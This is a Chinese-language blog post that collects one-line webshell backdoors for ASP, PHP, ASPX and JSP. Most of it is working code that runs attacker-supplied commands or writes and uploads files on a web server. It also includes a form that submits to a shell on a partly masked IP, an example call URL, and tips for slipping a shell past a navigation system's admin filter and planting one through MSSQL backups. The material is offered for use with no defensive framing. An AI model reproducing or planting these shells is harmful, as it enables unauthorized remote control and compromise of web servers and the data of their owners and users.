• 沙里软件

  • ShaliSoft.com [手机站]   办公桌收纳抽屉
  • 首页
  • 博文
  • 演示
  • 管理
  • webshell一句话木马大全

    网络   2013/11/6 17:59:40

    比较全的webshell一句话包括ASP,PHP,ASPX,JSP

    asp一句话木马程序代码

    <%eval request(“sb”)%>

    程序代码

    <%execute request(“sb”)%>

    程序代码

    <%execute(request(“sb”))%>

    程序代码

    <%execute request(“sb”)%><%’<% loop <%:%>

    程序代码

    <%’<% loop <%:%><%execute request(“sb”)%>

    程序代码

    <%execute request(“sb”)’<% loop <%:%>[code]
    [code]<script language=vbs runat=server>eval(request("sb"))</script>

    程序代码

    %><%Eval(Request(chr(35)))%><%

    程序代码

    <%eval request("sb")%>

    程序代码

    <%ExecuteGlobal request("sb")%>

    程序代码

    if Request("sb")<>"" then ExecuteGlobal request("sb") end if
    //容错代码

    程序代码

    <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
    <%
    var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
    lcx.性别((lcx.名字)+'');
    %>
    //使用冰狐一句话客户端链接

    程序代码

    <%
    Set o = Server.CreateObject("ScriptControl")
    o.language = "vbscript"
    o.addcode(Request("SubCode")) '参数SubCode作为过程代码
    o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
    %>

    调用示例:
    程序代码

    http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29


    php一句话

    程序代码

    <?php eval($_POST[sb])?>

    程序代码

    <?php @eval($_POST[sb])?> //容错代码

    程序代码

    <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句

    程序代码

    <?$_POST['sa']($_POST['sb']);?>

    程序代码

    <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

    程序代码

    <?php
    @preg_replace("/[email]/e",$_POST['h'],"error");
    ?>

    //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入

    程序代码

    <O>h=@eval($_POST[c]);</O>

    程序代码

    <script language="php">@eval($_POST[sb])</script>

    //绕过<?限制的一句话


    JSP一句话

    程序代码

    <%
    if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
    %>

    提交客户端

    程序代码

    <form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
    <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
    <input type=submit value="提交">
    </form>


    ASPX一句话

    程序代码

    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

    程序代码
    <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>

    //Jscript的asp.net一句话

    程序代码

    <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])   ); }%>

    //C#的asp.net一句话

    程序代码

    <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

    //VB的asp.net一句话


    第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码,所以可以试用<script language="php">...<script>来绕过

    第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客

    第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.


    阅读(53225) 分享(0)

    上一篇: 一句话木马大全
    下一篇: jquery radio取值,checkbox取值,select取值,radio选中,checkbox选中,select选中,及其相关

  • 精彩推荐

    ◆ 安装完office后 在组件服务里DCOM配置中找不到
    ◆ 微信清缓存工具,微信怎么清理缓存?
    ◆ 用回溯法解决子集和问题【C#版本】
    ◆ 实测什么物体会影响WIFI信号
    ◆ 利用UC微信分享接口进行WEB微信分享
    ◆ ASP.NET之GridView Eval() 中数据格式化或格式化数据
    ◆ css常用hack语法
    ◆ 面向对象的缺点,你了解了吗
    ◆ 我国首台可人脸识别ATM机发布 不刷脸不能取钱
    ◆ 2G网络要关闭了吗?你还不打算换4G手机?
  • 用心做事 不能唯利是图

    • 吊儿
    • 用QQ联系我17905772
  • 搜索


  • 最新文章

    • 导出Excel 格式 mso-number-format
    • 服务器iis支持tls1.2,windows server 2008 r2 中IIS启用TLS 1.2(安装SSL后用TLS 1.2)
    • MySQL配置优化
    • EditPlus 添加文件比较工具winmerge
    • 滚动悬浮固定JS特效

  • 热门文章

    • php sso单点登录实现代码
    • 中国菜刀(China chopper) 最新黑客工具
    • redis.conf中文版(基于2.4)
    • 搜索引擎名单大全
    • php图片上传类,支持加水印,生成略缩图

  • 最新图库


  • 最新评论


  • 友情链接

  • 沙里软件

  • 最近访客

    Powered by ShaliSoft.com 豫ICP备13008529号

    免责声明:本站部分内容来源于互联网,转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,不为其版权负责,也不构成任何其他建议。如果发现侵犯版权,联系QQ17905772进行删除。